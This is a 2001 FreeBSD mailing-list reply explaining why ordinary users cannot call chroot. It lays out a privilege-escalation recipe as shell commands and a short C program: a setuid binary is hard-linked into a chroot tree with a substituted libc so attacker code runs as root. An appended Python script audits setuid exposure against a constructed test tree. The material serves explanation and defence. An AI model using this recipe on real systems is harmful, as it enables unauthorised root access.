Date: Mon, 8 Oct 2001 13:23:20 +0100
From: Mike Bristow
To: Thierry Black
Cc: freebsd-hackers@freebsd.org
Subject: Re: chroot
Message-ID: <20011008132320.B52388@lindt.urgle.com>

On Thu, Oct 04, 2001 at 05:32:16PM -0600, Thierry Black wrote:

[ please don't write in HTML.  Do it again and I'll drop you in a kill file.]

However, to answer the question "why don't we allow users to chroot",
I present you with:

$ mkdir -p hack/usr/lib
$ mkdir -p hack/usr/bin
$ cp evilness.so hack/usr/lib/libc.so
$ ln /usr/bin/at hack/usr/bin
$ cat hack-a-tack.c
#include <unistd.h>
int main (void)
{
	chroot("hack");
	execl("/usr/bin/at", "/usr/bin/at", (char *)NULL);
}
$ gcc -o hack-a-tack hack-a-tack.c
$ ./hack-a-tack

Now, code I wrote is running with root privileges.  While it's clearly
running in a chrooted environment, you can still do Very Bad Things.

(This, of course, assumes that you have write permissions somewhere on
the same file system as a suid program.  This is probably true on many
systems.)

-- 
Mike Bristow, seebitwopie
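The precondition named at the end of the message (write access somewhere on the same file system as a setuid program) can be checked from the defender's side. The following is an added example, not part of the original post: the function names and the constructed directory tree are assumptions, and the setuid stand-in is an empty file owned by the caller, not a real root-owned binary.

```python
import os
import stat
import tempfile


def audit_setuid_exposure(root):
    """Return one finding per setuid file under root: its path, how many
    other names (hard links) it has, and which directories on the same
    filesystem the calling user could create a further link in."""
    setuid, writable = {}, {}          # both keyed by st_dev (filesystem id)
    for dirpath, _dirs, filenames in os.walk(root):
        dev = os.lstat(dirpath).st_dev
        if os.access(dirpath, os.W_OK | os.X_OK):
            writable.setdefault(dev, []).append(dirpath)
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue               # entry vanished or is unreadable
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                setuid.setdefault(st.st_dev, []).append((path, st.st_nlink))
    return [
        {"path": p, "extra_links": n - 1,
         "linkable_from": sorted(writable.get(dev, []))}
        for dev, files in setuid.items() for p, n in sorted(files)
    ]


def make_constructed_tree():
    """Constructed sample input: an empty stand-in file with the setuid bit
    (owned by the caller, not by root) plus the extra link from the message."""
    base = tempfile.mkdtemp(prefix="suid-audit-")
    os.makedirs(os.path.join(base, "usr", "bin"))
    os.makedirs(os.path.join(base, "hack", "usr", "bin"))
    target = os.path.join(base, "usr", "bin", "at")
    open(target, "w").close()
    os.chmod(target, 0o4755)
    open(os.path.join(base, "usr", "bin", "ls"), "w").close()  # no setuid bit
    os.link(target, os.path.join(base, "hack", "usr", "bin", "at"))
    return base


if __name__ == "__main__":
    for finding in audit_setuid_exposure(make_constructed_tree()):
        print(finding["path"], "extra links:", finding["extra_links"],
              "writable dirs on same fs:", len(finding["linkable_from"]))
```

Keeping user-writable directories on a different file system from setuid binaries empties `linkable_from`, since hard links cannot cross file systems.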